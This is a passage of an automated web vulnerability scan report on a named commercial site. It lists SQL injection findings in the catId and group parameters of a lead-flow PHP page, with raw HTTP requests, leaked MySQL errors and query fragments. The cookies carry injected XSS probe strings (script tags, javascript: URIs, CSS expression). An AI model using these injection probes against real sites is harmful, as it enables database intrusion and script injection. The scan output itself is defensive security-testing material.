OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:32:27 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=fp0pk1l0k7tjhfiiug3c8dfod3; path=/
Content-Length: 129
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/project_dynamic_page_updated.php'' was not found on this server.</p>

1.277. http://www.insideup.com/ppc/leadflow/dima00/project_dynamic_page_updated.php [catId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/dima00/project_dynamic_page_updated.php

Issue detail

The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

POST /ppc/leadflow/dima00/project_dynamic_page_updated.php?catId=80006'&group=dima00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 535

subcategoryId=80006&catId=80006&iusrc=iupsc+&attributeId_423[]=2758__Other&attributeId_424=2763__Other&attributeId_425=2766__No+-+We+will+need+to+obtain+a+list+of+addresses&attributeId_426=2773__500%2
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:26:29 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=aja3gk3nol2aec0kchgl89kjg5; path=/
Content-Length: 2486
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
leadflow/dima00/project_dynamic_page_updated.php?catId=80006'&group=dima00&template=3' OR prj.project_page_url = 'leadflow/dima00/project_dynamic_page_updated.php?catId=80006'&group=dima00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'group=dima00&template=3' OR prj.project_page_url = 'leadflow/dima00/project_dyna' at line 5

Request 2

POST /ppc/leadflow/dima00/project_dynamic_page_updated.php?catId=80006''&group=dima00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 535

subcategoryId=80006&catId=80006&iusrc=iupsc+&attributeId_423[]=2758__Other&attributeId_424=2763__Other&attributeId_425=2766__No+-+We+will+need+to+obtain+a+list+of+addresses&attributeId_426=2773__500%2
...[SNIP]...

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:26:30 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=1vm2ktmpdg3vj2keh64b5bf0e3; path=/
Content-Length: 127
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/project_dynamic_page_updated.php was not found on this server.</p>

1.278. http://www.insideup.com/ppc/leadflow/dima00/project_dynamic_page_updated.php [group parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/dima00/project_dynamic_page_updated.php

Issue detail

The group parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the group parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

POST /ppc/leadflow/dima00/project_dynamic_page_updated.php?catId=80006&group=dima00'&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 535

subcategoryId=80006&catId=80006&iusrc=iupsc+&attributeId_423[]=2758__Other&attributeId_424=2763__Other&attributeId_425=2766__No+-+We+will+need+to+obtain+a+list+of+addresses&attributeId_426=2773__500%2
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:26:37 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=jiiatqchr2og5g9656gf3k2o47; path=/
Content-Length: 2486
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
leadflow/dima00/project_dynamic_page_updated.php?catId=80006&group=dima00'&template=3' OR prj.project_page_url = 'leadflow/dima00/project_dynamic_page_updated.php?catId=80006&group=dima00'&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/dima00/project_dynamic_page_updated.php?ca' at line 5

Request 2

POST /ppc/leadflow/dima00/project_dynamic_page_updated.php?catId=80006&group=dima00''&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 